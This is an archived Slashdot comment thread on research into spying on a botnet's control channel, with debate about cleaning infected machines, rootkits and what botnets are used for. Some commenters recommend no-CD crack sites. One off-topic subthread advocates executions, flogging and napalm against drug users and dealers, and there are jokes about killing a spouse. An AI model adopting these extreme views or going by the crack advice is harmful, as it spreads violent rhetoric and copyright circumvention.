Eavesdropping on a Botnet

wild3rbeast writes "Joe Stewart, a senior security researcher with LURHQ's Threat Intelligence Group has figured out a way to silently spy on a botnet's command-and-control infrastructure, and finds that for-profit crackers are clearly winning the cat-and-mouse game against entrenched anti-virus providers. From the article: 'The lesson here is once you get infected, you are completely under the control of the botmaster. He can put whatever he wants on your machine, and there's no way to be 100 percent sure that the machine is clean. The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'"

Empty Words.

[Enoxice]

FTFA: "Stewart successfully started spying on the control channel, but there was not much to see."

In other words: nothing to see here, just remember to patch your computers.

Seriously, I was hoping for some real news, because I find malware incredibly interesting. Alas, TFA was a let-down...

bot free, really...

[MeatFlap3]

I would imagine this applies only to the BORG boxes out there... So if you are running Solaris on SPARC, are you safe from these bots?

-r

Re:bot free, really...

[arivanov]

Flamebait, but I will take it.

The first time I have seen stealth kernel mode rootkits in the wild for Linux and Solaris was Dec 1996. This is nearly 10 years ago. As a matter of fact in this area Linux and Solaris were first and Windows did not really follow until 2K became commonplace in the home. From there on the malware writers came back and hacked 98 and me.

So your optimism regarding SloWarez is misplaced and misguided.

malware-free system?

"The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'" ...or to run a live-CD version of some OS where all you need to do is reboot
options abound Linux, BSD, Windo... oh, forget about that last one

Re:malware-free system?

[JamesTRexx]

Sort of like my first reaction, "The only way to be sure is to run something that is not Windows".

Until someone creates something that can infect the various *nixes that is.

Re:malware-free system?

[Nested]

Until someone creates something that can infect the various *nixes that is. Or an asteroid destroys Earth.

Re:malware-free system?

[marcello_dl]

How come a security guy doesn't mention live CDs. I seem to recall somebody did a live windows cd. Personally i'd go for a free live distro, I'd boot from it and download clam or similar stuff to scan the HD. Unless the guy meant there could always a rootkit not detectable by a current anti virus. But, this level of paranoia should make you reinstall your OS every time you use your PC... and never install closed stuff like windows, anyway.

Re:malware-free system?

[Nutria]

Until someone creates something that can infect the various *nixes that is.

It's called a rootkit. They've been around for years.

Find a *ix server that's running a vulnerable process listening on an exposed port (DNS, ssh, ftp, http, pop, imap, smtp, whatever). Root that box and install your malware.

Just by the virtue of the large number of x86 Linux servers exposed to the Intarweb, there must be thousands of systems just waiting to be rooted.

Fortunately for "us", there are millions of exposed Windows client PCs running as Adminstator, begging to be owned.

Re:malware-free system?

[httptech]

The actual quote in my analysis is "unless you are a malware expert..."

Running a liveCD with a rootkit scanner and an antivirus isn't going to cut it - you have to have the knowledge to know what to go after - you'd be surprised at how much malware doesn't get detected by scanners even months after its been released.

Although I might use liveCDs myself to do malware recovery, average users are going to be in over their heads. So I didn't mention it.

-Joe

Re:malware-free system?

[xeoron]

True... The best protection is just running a computer off a livecd and have network file storage

Re:malware-free system?

[Yyrkoon420]

So I guess the idea of ERD 200x, Windows PE, etc were completely lost on you ? Lets not forget that atleast the two items I've mentioned can actually mount, read, and write to a NTFS file system without problems, and ERD can break / reset passwds locally. There are also other options such as booting from USB (where you can use many different media types), booting into safemode (assuming you're running windows), and writting your own applications for finding, and dealing with viruses in general. Since we're obviously talking mainly windows here (key word virus . . .) I think its rather limited thinking that you would use a different OS to deal with said system.

Re:malware-free system?

freeware Rootkit Revealer by sysinternals may help avoid an OS reinstall

Re:malware-free system?

[thoughtlover]

"process listening on an exposed port (DNS, ssh, ftp, http, pop, imap, smtp..."

Not to mention Perl, PHP, SQL-injection, AJAX hacks, and, I'm sure that there will be some sort of way the CMOS could become infected someday.............remember that an image is (was) just an image and can't infect your computer? What about UPnP? I'm sure people are trying to figure out a way to exploit that. Really, I don't profess to know anything. I just read the headlines, here.

Re:malware-free system?

Hmmm.

Or if the OS could be put on a write-locked flash thumbdrive.

Personally I'd like that myself because then I wouldn't have to worry about badly written programs.

Re:malware-free system?

[linuxwood]

You do not need a rootkit to turn a linux box into a spam-bot... All it takes is one bad cgi/php page in a Web Hosting environment (100+ virtual sites) for a perl spam proxy to get launched from tmp on an unprotected port. Matt Wright has kept all the bad web developers in the business of poor web code for years.

I cannot tell you how many bad contact me web pages exist on the Internet with many of the worst being on Linux et al. Things like mod_security and PHP safe mode only mitigate certains cases. Its a pain plugging the holes of customer application code no matter how secure the operating system you are using to service them.

Re:malware-free system?

[Barryke]

I guess its more about user-stupidity, not OS.
Some users just click Yes without actualy knowing what they're dealing with.

'Oh no, it *web dialog* says i've got an insecure linux!
Very well, i will execute that very official looking script this nice site offers!'

^ Thats mostly ppl who use Windows, yes.

Re:malware-free system?

[ericlondaits]

Not really... a spammer once got inside my linux box at work through an Apache exploit (which, afaik, wasn't even available to outside IPs ... though not properly firewalled, I'll grant you that).

Anyway, the thing is, the guy used a script-kiddie package to take control of the server and spam... the first signal when I came into the office next morning was the server severly trashing around, but not because of the spamming but because (as I later found out through google) every copy available of the package he used to seize control was infected with a linux virus.

Even when I managed to "fix" the machine, I still wasn't sure if the guy, package or virus had compromised any other part of my box, so I had to reinstall.

Re:malware-free system?

[junglee_iitk]

On gentoo, the virus needs to self-recompiling :)

It's a bird. It's a plane. It's TC!

"The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'""

Trusted Computing to the rescue!

Re:It's a bird. It's a plane. It's TC!

[l33t+gambler]

Trusted Computing to the rescue!

Absolutely! Trusted Computing is made to protect consumers from potential threats, but will it let consumers decide what is trustworthy? I recently discovered I had a UAService7.exe running in my Task Manager. After a search I found it is a SecuROM service, and lo and behold theres a service with that name in Services.

I can't remember being asked by a game or application to install such a service, and I don't know how to remove it as there's no reference to it in either Start Menu or Add/Remove Programs.

http://jooh.no/root/torrents/trusted-computing.tor rent

Re:It's a bird. It's a plane. It's TC!

[The+MAZZTer]

Some games use it for CD verification. If you tamper with it (ie remove it) the game will likely fail it's CD check and no longer run.

I have a game that uses it, you probably agree to it in the EULA somewhere. I forget which game it was...

Oh and I can't help but notice, as others have before me, that software pirates are not encumbered by these restrictions and bloatware, while legitimate customers are forced to use it.

Re:It's a bird. It's a plane. It's TC!

[mrbcs]

Every game I buy, before installation, I go to gamecopyworld.com and get the no-cd patch. I friggin HATE putting the cd in every stinkin time I want to play a game.

Re:It's a bird. It's a plane. It's TC!

[ScrewMaster]

Indeed ... I trust it to be subverted at the earliest opportunity.

Re:It's a bird. It's a plane. It's TC!

[smitingpurpleemu]

Gameburnworld.com works quite well as well. Sometimes I can't find stuff at one, so I look at both.

Re:It's a bird. It's a plane. It's TC!

[PSC]

Trusted Computing is made to protect consumers from potential threats

At least that's what they're selling us. Frankly, I have serious doubts about their motives. Probably the same doubts you seem to have:

but will it let consumers decide what is trustworthy?

Cynical question: Why should they? The average consumer has no idea whether a particular piece of software is thrustworthy - they click "yes" in every dialog. Heck, they even click on phishing links. So when the TC chain detects a new service to be installed, it will most likely delegate the decision to someone allegedly thrustworthy: the O/S vendor, who certifies applications. So basically only applications with a certificate from the O/S vendor can be installed.

That train of thought leads directly to this really insightful remark by John Gilmore:

"Be very glad that your PC is insecure - it means that after you buy it, you can break into it and install whatever software you want. What YOU want, not what Sony or Warner or AOL wants."

Or some O/S vendor who shall remain unnamed.

(At first I modded grandparent +1 Funny because the subject really made me laugh. A cynical laugh, mind you.)

Happened to me.

This happened to me once... even with a fully patched XP, up to date Norton, and Ad-Aware installed. For peace of mind, I too decided the format/reinstall route was the best option. I've since switched to the Mac and have been problem free.

Re:Happened to me.

your probably had a weak password.. patches wont save everything you know.

Re:Happened to me.

Yeah, you're probably right. At the time it was a dictionary word, two numbers, and then another dictionary word.

Re:Happened to me.

My house was robbed once... even with fully locked doors, up to date alarm company subscription, and a dog. For peace of mind, I decided blowing up the house was the best option. I've since moved to the woods and have been civilization free.

Re:Happened to me.

do you know my dad

Re:Happened to me.

[JoeCommodore]

This needs some re-working

My house was robbed once...

It was one of those cheap houses, you know using old materials and not the best contractors (the doors and windows would not always close properly.)

even with fully locked doors, up to date alarm company subscription, and a dog.

Though that brand of locks use one of five common keys, and the alarm company sometimes works with other companies to let marketers in, and the dog, as vigient as he is is just a dog and frankly pretty stupid.

For peace of mind, I decided blowing up the house was the best option. I've since moved to the woods and have been civilization free.

Actually it was more like a posh wooded suburb gated-community thing, where all the prices are higher and the selection is more limited, but the cars are to die for. I don't even assoiate with my old neighbors much anymore. My kids ands wife are much more happier and I have a lot less stress about stuff like that.

Now if it were Linux, you would probably be in the woods, in some commune, inside an abandoned high security military bunker, whith a lot of really smart people that don't socialize all that well.

Re:Happened to me.

[Nutria]

Now if it were Linux, you would probably be in the woods, in some commune, inside an abandoned high security military bunker, whith a lot of really smart people that don't socialize all that well.

Humorous, but you've probably never been to a LinuxCon.

Next opportunity

[QuantumFTL]

Perhaps the next opportunity for profit in this game is to hack other people's botnets to bend to your own purposes? Probably a lot less risky than hacking thousands of potentially litigous members of the public. Secure encryption would stop most of this, however the master endpoint computer would still have some vulnerability.

Re:Next opportunity

[Enoxice]

I can see it now: In the future there will only be one botnet, then the entire hacking community will just be a big game of RootThisBox (http://rootthisbox.org/) (hmm...RTBs website seems to be redirecting to HackThisSite for some reason).

Re:Next opportunity

[Sir_Lewk]

I'm sure it happens, though I think that at least the larger botmasters know enough of the tricks to protect themselfs from others.

Re:Next opportunity

[Beryllium+Sphere(tm)]

I wish I could remember where I read this so I could give you a cite, but there have been reports of turf wars over botnets already.

Re:Next opportunity

[ZzzzSleep]

As always in situations like this, I give a link to Curious Yellow!

PC Clinic

[Short+Circuit]

At my computer club's PC Clinic, I set up Ethereal on our network gateway computer, to keep track of things. You can easily see this kind of crap going on.

Re:PC Clinic

[JavaBrain]

I'm assuming sophisticated key catchers do not have to be post keys as they are typed, nor do they have to post the keys in the clear. Keeping that in mind, are you sure you can tell what's going on?

Re:PC Clinic

[Short+Circuit]

are you sure you can tell what's going on?

Well, systems are only connected to our network for a few hours at most. Less, if we see traffic that bothers us. Like this last time, two of the machines started scanning all the IPs on the class C subnets adjacent to the subnet we were using. We put a stop to that. The only botnet activity I saw was repeated attempts to connect to the IRC port of a domain name. However, that domain had expired, so the bots couldn't connect.

I'm looking around for a way to prevent machines on our network from talking to each other...putting each one on its own subnet seems like a good idea, but I don't know how to set up Linux dhcp to do it.

Re:PC Clinic

[Ravatar]

Well it depends on how you define "talking to each other", in some situations you want this to be possible I'm assuming. However for particular ports, couldn't this easily be accomplished with iptables? Sorry for the potential ignorance, I'm not too horribly familiar with ipchains/iptables.

Re:PC Clinic

[Short+Circuit]

Sortof.

iptables (and other filtering software) would only be effective if the bad packets were required to pass through the machine with the filtering on it. The problem is, if two machines are on the same subnet, they can communicate directly with each other, ignoring the machine with the filtering software on it.

One possible solution is to force each machine attached to the network onto its own subnet. The problem is, I don't know of a dhcpd that will put machines on different subnets without a means of identifying which machines should go to which subnet. And then there's the issue of creating alias IP addresses on the filter/gateway machine for each subnet in use. (Otherwise, the "patient" computer won't be able to access the network at all.)

Of course, a decent Cisco switch should be able to do it...but by the time any student at our college knows how to work Cisco, he's already moved on to a four-year institution. Hmm...maybe I should invite GVSU's or Davenport's Computer Club equivalents to participate in our clinic. I've got contacts...

Re:PC Clinic

[bjohnson]

I'm looking around for a way to prevent machines on our network from talking to each other...

Scissors http://www.dumbentia.com/pdflib/scissors.pdf

Re:PC Clinic

[Short+Circuit]

That's essentially what we do...keep machines disconnected unless they need to be. Unfortunately, that adds a bottleneck to our servicing process, which is why I'm looking for a higher-level solution.

To clarify...

[Drinian]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

:s/reinstall the operating system/install Linux/g

Re:To clarify...

:s/install Linux/put a gun in your mouth and pull the trigger/g

"Post to Slashdot"

[Gopal.V]

It is the first time I've ever seen a "Post to Slashdot" icon on any news item.

(yeah, I pretty much forgive the Digg one, everybody has those ...)

Re:"Post to Slashdot"

[triso]

It is the first time I've ever seen a "Post to Slashdot" icon on any news item....

It isn't very useful yet--it only goes to the submit screen, most of the fields are blank and it doesn't even fill in the URL of where you clicked on the "Post to Slashdot" button to get here.

Joe Stewart said Comedy Gold!

OMG Think he's a goon??

Makes you wonder what else is going on

[perkr]

Spam is one thing, but once you got access to the machine, getting logins and passwords for online stock and bank account services via a keylogger is completely different. I wonder how much stuff is silently running on users machines right now...

Re:Makes you wonder what else is going on

[mapkinase]

There should be tougher laws on people who break in the computers. It should be equal to breaking and entering people's houses.

Tough laws work given their enforcement (I meant, once caught, got 10 years of gang-infested prison time, people will look at the keyboard in a different way).

Re:Makes you wonder what else is going on

[Lusa]

Perhaps, but there is a massive flaw. This assumes that the people doing this can be caught and prosecuted. Chances are they aren't even on the same continent as the computer. Until the planet is under some kind of single law then this sort of thing will not work. I think it'd be easier and better to isolate and control network traffic. Have a safe known configuration of OS, programs, firewalls etc in a read only format that can quickly be ghosted back onto the hardware if an infection is detected. Sort of like a live CD but personalised. Of course, this would require an overhaul of the way things are done. But it needs to be done. Now, if we could get offensive firewalls as in Ghost in the Shell we could have some fun :D

Re:Makes you wonder what else is going on

[mapkinase]

It does require a lot of effort, but for every uncatchable hacker there are plenty loser hackers. Catch them, and punish dearly so the "uncatchable" ones think twice.

Re:Makes you wonder what else is going on

[msobkow]

Most of the traffic I log and run a traceroute on bounces through a number of nodes into the "darknet" of unregistered IP addresses. Even there it bounces through 3-5 darknet nodes before hitting a recognizable backbone or gateway node. Although certain nations primary gateways are common, there is no way to tell whether the attacker is located in that nation or using compromised darknet machines in that nation.

The odds are that the majority are located in Canada or the US and simply using darknet proxies.

Re:Makes you wonder what else is going on

[mapkinase]

When the crime will be more wide-spread, the darknet will be hit by interested governments.

I think that the problem with this is that there are tons of dummies with unprotected computers that do not see the disadvanatge of their computers being used for "dark" purposes.

In short, big problems will get big attention, small problems are getting small attention. Inasmuch as personally I want every organizaed crimial whipped, hanged, executed, tortured and very much dead, the trouble from them seems not that big. Otherwise, the repuglican dogs would be unleashed on them.

Re:Makes you wonder what else is going on

[uvajed_ekil]

There should be tougher laws on people who break in the computers. It should be equal to breaking and entering people's houses. Tough laws work given their enforcement (I meant, once caught, got 10 years of gang-infested prison time, people will look at the keyboard in a different way).

As the US criminal justice system proves every day, stiff penalties for crimes do not necessarily act as effective deterrents. We have embarassingly high violent crime rates in the US, despite the penalties being more harsh than in most of Europe and many other places. Until the certainty of apprehension becomes greater (i.e. unless potential criminals think they'll get caught) we'll continue to have high crime rates. I suspect the same applies to computer-based crimes; for-profit hackers don't care about the jail time since they are usually not caught to begin with.

You could make the penalty for all crimes death by hanging, but if you have no cops catching people, or even knowing where and how to do so, you'll still have crime.

Re:Makes you wonder what else is going on

[mapkinase]

Well, the crime in US is localized to poor neighborhoods, mostly. May be poor neighborhoods should have preventive laws, like curfew for youngsters, like prohibition of gathering more than 3. I am just throwing ideas here.

The laws are touch for murder, but they are nearly not tough enough for prostitution and drugs. Basically every shady business that organized crime feeds on should be penalized severly - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...

I am telling you people will think twice before dealing a baggy of pot if they would knew that they will get life or beheading for that.

Re:Makes you wonder what else is going on

Common things they are used for at the moment include:

• Proxies for further system cracking (self-explanatory)
• Spam proxies (specialised SMTP proxies rented out to spammers for, say, Send-Safe)
• Spyware installation (some spyware companies, for example VX2, have a long and illustrious history - despite their denials - of paying "affiliates" more or less per-seat, which could be lucrative given access to a botnet of Windows machines you utterly do not care about)
• Data mining for identity theft, via keylogging and/or static analysis (at the moment; banking, Paypal, eGold login/passwords, and of course the old faithful credit card numbers, but also some more exotic things; in particular MMORPG login/passwords - WoW gold goes for around $50-$70 per 1000g, so you may wake up to find your epics vendored and your account cleaned out)
• and of course the old classic, DDoS extortion and botwars

Occasionally, they are used for less common things. Some things that spring to mind:

• Proxies for "bulletproof" hosting (think spam sites, when they don't want to use Russia or China, although the spammers themselves are frequently American)
• Cryptoviral extortion (which is to say, "We have encrypted your files - pay up and we decrypt them")
• Illicit webservers or FTP dumps containing stuff you do NOT want to be even unknowingly hosting, enough said

Re:Makes you wonder what else is going on

[Pantero+Blanco]

You'd also end up with many more dead cops, and much more sympathy for those criminals. If the penalty for dealing pot or prostitution was death or life in prison, I for one would offer safe haven and protection to pot dealers and prostitutes.

Re:Makes you wonder what else is going on

[uvajed_ekil]

I still don't understand why people think we need longer jail/prison sentences. Doing as "little" as a few years, 6 months, or even a few weeks time would surely alter every aspect of my life, which is true for most people, as well. Even 30 days in the ocunty jail would cause me to lose my job, my home, and most of my possessions, so increasing the penalty for a crime to a year or two wouldn't be much more effective than a month in the clink. But if I really think I can get away with something, I might still do it, either way. (Not me personally, just talking hypothetically.)

As for restrictions on people in poor neighborhoods, as suggested? That stinks of Soviet Russia and modern North Korea. We have lots of crime in the US, but we also have a Constitution. Crime sucks, but our freedom is what makes this the greatest country in the world. Economic descrimination is as horrible as any other form of descrimination. If you want to eliminate ghetto crime, eliminate the ghettos.

This discussion was really about botnets and associated crime, for which there are already criminal penalties. But as I said, no one is catching these folks with any regularity, and until we do the length of prison terms makes absolutely no difference.

Re:Makes you wonder what else is going on

[mapkinase]

It is not about you. One of the purposes of punishment is deterrant. One thing is steeling for yourself, another thing is bookmaking for called mafia.

There is a big difference between crime and organized crime. The latter should be stopped by all means.

If a person is showing even a sign of Cribs, he should be executed on the spot. That is how organized crime should be dealt with.

Re:Makes you wonder what else is going on

Wow. I really hope you're trolling.

Re:Makes you wonder what else is going on

[suffe]

Who wouldn't, death penalty or not.

Re:Makes you wonder what else is going on

wait, do your suggestions apply only to other people, or to you too? For example, if you hand a prostitute some money, should you be executed on the spot (no chance to defend yourself, etc)?

Re:Makes you wonder what else is going on

Basically every shady business that organized crime feeds on should be penalized severly - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...

Politics.

Re:Makes you wonder what else is going on

Basically every shady business that organized crime feeds on should be penalized severly - bookmakers, gamblers, shark loaning, drugs, prostitution, what else...

Politics.

Law enforcement...

Re:Makes you wonder what else is going on

[uvajed_ekil]

Huh? In some jurisdictions, depending on the quantity, selling pot can net you many years in prison. I have no idea what you are talking about, whether you mean you would protect simple pot dealers (for which I can't blame you) or that you would like to see pot dealers in prison (which seems like a waste of valuable resources). Please elaborate.

Even in places where there are serious penalties for selling pot, demand and supply have remained high (no pun intended). Pot may alter some people's lives a bit (as can overeating, watching lots of television, reading too many sci-fi novels and chosing to do many other things that are "unproductive"), and it may appear most frequently in poor neighborhoods, but pot is known amongst all socioeconomic groups and doesn't kill anyone, so I see no point in cracking down on it. Doing so has never been proven to eliminate or lessen crime in general.

As for prostitution, most hookers are uneducated women who feel they can make more money and be happier turning tricks than working at legitimate minimum wage jobs. I wish they didn't feel a need to sell their bodies, but what else can they do? Making $200 a week at a legit job doesn't pay the bills of the most modest family. More than anything, I feel bad for these people and that they have to resort to "criminal" means to live a still very hard life.

Re:Makes you wonder what else is going on

[uvajed_ekil]

Yes, he should, because that means he is a participant of organized crime (as well as being a hypocrite). That is by his logic though, not mine. I could argue that him speeding in a 35mph zone constitutes a premeditated act against common laws (he got in his car, started it, and proceeded to drive at reckless speeds -- lock him up!!), so he should have the benefit of NO doubt.

That's just silly though, as are our penalties for "victimless" crimes. Sure, crack smokers are getting into lots of trouble because they smoke crack, but their underlying problem is being poor, dumb, and destitute. If we, as a society, can prevent them from ever being these things, they'll probably never make the bad choice to hit the rock in the first place.

As for obviously thought-out crimes like identity theft and running botnets for profit, come on, these people are obviously smart and obviously greedy. They have valuable skills but CHOOSE to use them for evil rather than good because being middle-class isn't good enough for them. Different game here. Fuck'em, lock 'em up.

Re:Makes you wonder what else is going on

[uvajed_ekil]

You'd also end up with many more dead cops, and much more sympathy for those criminals. If the penalty for dealing pot or prostitution was death or life in prison, I for one would offer safe haven and protection to pot dealers and prostitutes.

We already have more cops killed every year in the US than in all other Western nations combined, even with our harsher criminal penalties. Thanks for making my point for me!

Re:Makes you wonder what else is going on

[geschild]

Your post could be a troll, but since you attach your name to it, I'll reply.

Your 'plan' would mean that the prison system wouldn't just be 'overloaded' but it would gravitate out of control before the year was up, putting lots of people in prison who have been functioning members of society. The cost to society would be unimaginable: prisoners cost a lot of money to accomodate and those imprisoned do not contribute to society, monetary or otherwise.

And all this for what? Because your personal beliefs are different from these people's? People who use drugs or prostitute themselves are not harming anyone else with their actions, no matter how hard you argue.

(And should you drink alcohol, you yourself are a 'drug-user' too. One of the 'hardest' drugs around, actually: http://news.bbc.co.uk/1/hi/uk_politics/5230006.stm )

I suggest you read up on the principles of penal systems before you go and advise modifications to one.

Re:Makes you wonder what else is going on

Did you read the post the parent post was replying to, or did you get two different posters confused? He's saying that putting them to death would be a dumb thing to do, and he'd protect them if that were the case. The post above him is the one calling for harsher punishments.

Re:Makes you wonder what else is going on

[mapkinase]

Well, since you started about alcohol (or tobacco, why not), I am against it too. Alcohol consumption should be punished by flogging.

As for trolling. The changes I am proposing should be gradual - gradual increase of punishment. Then there will be no significant increase in prison population.

Inevitable also is idea of restricting rights. As I proposed in one of my posts in this thread, the troublesome gang-infested communities should have been restricted basic freedoms long time ago. Total sweeping raids of the houses in these communities should be allowed.

The problem with American population is that it is connecting too much together economical and political rights. One has to realize that the crime getting out of hand could be stopped only at the expence of political freedoms.

The more economical freedoms you have (read, more of laissez-fair) the more disparity you have, the more economical disparity you have the more you need to suppress the population disillusioned in American Dream. Sounds like form a classic Marxist book, I know.

Low crime and political freedoms are highly incompatible. Crime is rampant in Europe. Since Putin (whom I detest with every gut) came to power in Russia, there is much less political freedoms and less organized crime - the streets of Moscow are safer.

According to, again Marx, state is just an organized gang. If you limit the actions of that gang, other organized gangs will sprout. Good state is a monopoly of one organized gang. The neighborhood controlled totally by only one gang are safer than neighborhood with gang feuds.

As for labeling, I am surprised, but not much.

End of musings.

Re:Makes you wonder what else is going on

[geschild]

Right. That settles it. You're off your trolley.

This is an experiment that has been done and its consequences were (arguably) much worse than its benefits: alcohol-prohibition ring a bell?

Net result: more crime, not less. Lots of hardship for otherwise innocent people and for what? Because some people don't want other people to be intoxicated for the hell of it? Who do you think you are telling other people what they can or cannot do with their own mind and body?

Gradual increase in 'deterrants' has never worked. People haven't quit smoking in droves because the taxes went up year after year, they are stopping now because of social pressure and even then some members of the population will keep smoking perhaps even because other people frown upon it. There are other examples like the addiction to Gas that isn't hampered by the gradual increase in oil-prices. If things suddenly get a lot worse, people are willing to take another look at their habbits. Gradual measures are merely a patch on an arterial bleeding and in the case of taxes a nice cash-cow.

Prisons will fill up. More gradually perhaps, but they will. It is happening as we speak so denying is pointless. An ever larger portion (as in percentage) of the population is being incarcerated and mostly because of petty crime, not because of institionalised mob practices. The illegalisation of drugs is one of the major driving forces behind organized crime so your argument is upside down, from a mere practical perspective at least.

As for your other arguments: it is clear you like strict government control on other people's behaviours yet you say to despise the ones excersising it to the ultimate extent. Rather strange philosophy you keep. I do hope no future governement in your country will consider your morals 'reprehensive' and put you in jail for it with the measures you now propose for the 'gang-infested communities' of today.

I also hope you get a better sense of what is 'right' and what is 'right according to you'. There is a difference, you know.

All the best.

Re:Makes you wonder what else is going on

[mapkinase]

Similar experiment, limiting alcohol consumption was done in Russia in the beginning of Gorbachev times. The result was peaked life expectancy.

The problem with us, Americans, that we think that it is our sacred right to do whatever harm we want to ourselves. This is an idiocy of overblown cornerstone of American democracy "the right to pursue happinness". Alright, do whatever you want to pursue happiness, but not at my expence, my friend.

If you come to me on the street threatening to kill me for $20 needed for drugs, be pretty sure, I want to eliminate the crazy person and the industry behind his craziness. This is persuit of MY happiness. _I_ will be happy when the drugs will be stomped upon with the iron foot. _I_ will be happy when Columbia will be isolated from the world community, when the plantations will be burned by napalm. When every mule entering the country will shot in the aiport in front travellers.

This is pursuit of MY happiness. How about that, liberal wussy?

Re:Makes you wonder what else is going on

[geschild]

You are simply reiterating the same faulty argumentation you've been fed without any critical thinking. I think most sane people would agree that any crimes against others should be punished including the addict that robs some-one to satisfy his/her habbit. There are laws for those crimes that are fine in and of themselves. The problem begins when people are pushed into crime because the act of using/possession is made an offense. Using drugs isn't a crime against anyone. Most other behaviour that only endangers one-self is still allowed and even some behaviour, like riding a motor-bike or climbing mountains that can put other lives in danger, is allowed as well.) Anything illegal you do because of the drug or the habbit is a crime and should be punnishable.

I'm not saying drugs should be easily accessible, I'm saying that they shouldn't be illegal perse because it doesn't dissuade people from using. Regulate, tax (to compensate for social damages for instance), do whatever is needed but don't make it a crime in and of itself.

I hope you stay happy even though you are now labeling me :) Please rememeber that in order to all be able to pursue happiness, pursuing ones happiness shouldn't infringe on someone elses pursuit of happiness but that seems to be what you are doing.

Re:Makes you wonder what else is going on

[mapkinase]

No. I am doing my pursuit in reply to violation of my rights for my basic right to live.

I like how the problem is solved in Singapour. Unfortunately, the climate over there is horrible.

Re:Makes you wonder what else is going on

[geschild]

Please help me out here, I'm quite sure I must be misunderstanding you completely.

You are pursuing happiness by pursuing people whom you perceive as violating your basic right to live simply by them using drugs?

If that is correct then my, are you both the overly sensitive and the depraved kind rolled into one! :D

I suggest you try and get used to the Singaporian climate. I think you are more likely to get used to the climate in Singapore than you'll be able to get over feeling threatened by people using drugs. Besides, it'll be a win-win situation because we won't have to hear you rant without reason.

Re:Makes you wonder what else is going on

[mapkinase]

Why don't you go somewhere else? I can share this country with you, my little liberal friend, it seems to me that you have a problem with me.

Re:Makes you wonder what else is going on

[geschild]

I think I've shown ample room for you to express yourself. You are the one bitching about the circumstances around where you live, denying others their right to pusue happiness the way they want because it doesn't match how you perceive happiness. You are wishing for more governement interference which is so neo-con (and so passe).

The only problem I have here is not with you but with your assertion of your own rights above those of others. You mentioned Singapore, not me, I just pointed out that if you think it is so great there and the only thing holding you back is the climate, then you're probably better of over there, accepting a lesser climate. And yes, you living in Singapore would benefit more people than just you, but that's beside the point. I'm just trying to help you make up your mind :).

Have a nice life but please, think of the children. ;)

Re:Makes you wonder what else is going on

[mapkinase]

This discussion is going nowhere. Last zillion posts were just byte-waste

malware-free system?-Linux.

"Until someone creates something that can infect the various *nixes that is."

That's impossible. How do I know. Just "Ask Slashdot".

Re:malware-free system?-Linux.

You mean "unpossible", don't you?

Be sure...

[shmlco]

"The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system."

I say we take off and nuke 'em all from orbit. It's the only way to be sure.

Re:Be sure...

[Linker3000]

Thank you - I had to scroll down several inches to see that comment but you have restored my faith in the Slashdot community.

I nearly thought that one had slipped through the next.

Re:Be sure...

[Linker3000]

May I have my 'x' back please!

Re:Be sure...

[modecx]

"The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system."

I say we take off and nuke 'em all from orbit. It's the only way to be sure.

Hey! That's my idea for people who drive wile talking on a cell phone, damnit! You just can't go around stealing other people's ideas so you can go twist them to fit some other problem! I mean, you know what happened the last time someone used a cotton jin to do something it wasn't meant to do? I'll tell you this, it was a tragic day that five men including Burt Reynolds, a goat, a family of opossums, and a small town in Arkansas will NEVER forget!

so many only/lonely ways.

[mapkinase]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'

In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.

Re:so many only/lonely ways.

[Odin's+Raven]

In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.

I dare say that whacking just the wife would be sufficient to put a stop to her cheating. Not to mention cheaper.

(Unless you have a 2-for-1 coupon from the local mob - no sense letting a freebie go to waste.)

Re:so many only/lonely ways.

[Jack+Action]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'

In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.

Isn't this equivalent to whacking yourself?

Re:so many only/lonely ways.

[mapkinase]

That will certainly solve all your worldly problems, but will it solve all your problems.

Re:so many only/lonely ways.

That's like the ancient joke:

A guy comes home and finds his wife in bed with another man. He flies into a rage, grabs his gun, and shoots his wife. The naked man says, "I was the one sleeping with your wife, why did you shoot her and not me?"

The husband says, "Is it not better to shoot a woman once than a different man every week?"

From TFA...

[dark-br]

"The lesson? Don't get infected in the first place"

Oh, *R*E*A*L*L*Y*? Gotta love some ppl aproach to security articles :/ *grin*

The only way to be [completely] sure...

[Harlequin]

The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.

Ripley: I say we take off and nuke the entire site from orbit. It's the only way to be [completely] sure.

Steve Gibson did something akin to this

[BertieBaggio]

I know he may not be the most favourite of people around here, but Steve Gibson was able to spy on the IRC command & control channel of a botnet a few years ago. It was precipitated by a DDoS on his site, which he investigated rather thoroughly.

Link to the article (...long article warning)

Some of the article is quite interesting, some is obvious, some is ego-boosting self-congratulatory statements, and some of it is his "teh XP can create complete 'UNIX sockets' OH NOES!" propaganda. Still worth a read, even if it is a few years old.

Re:Steve Gibson did something akin to this

[Fulkkari]

I was under the impression that since Windows XP SP2, Microsoft decided to disable raw sockets. Gibson's concerns were valid. There is no reason why there should be raw socket functionality on any consumer-level product. Raw sockets doesn't maybe make the computer itself more vulnerable, but it definitely can make it a bigger threat to other machines and networks, once compromised. The casual user doesn't use it and therefore won't even notice it's gone, not to speak of knowing about its existance in the first place. Just because a couple of guys want to play around with their network on their Windows XP Home Editions, you shouldn't enable raw sockets on the rest of the 99,9% of the computers. Period.

Need to hold users responsible.

[Rotten168]

If you are a computer user, you are responsible for the problems they are creating. ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped. Tough love.

Re:Need to hold users responsible.

[poolmeister]

Some ISPs do just that. I used to work for the abuse team for a cable ISP in the UK.
We had a policy of disconnecting customers who we'd found to have worm or spambot activity originating from their address.
If we weren't able to contact them straight away, we'd disconnect with the prejudice they deserved... n00bs

Re:Need to hold users responsible.

[Tom]

ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped.

Not going to happen in a million years, I'm afraid.

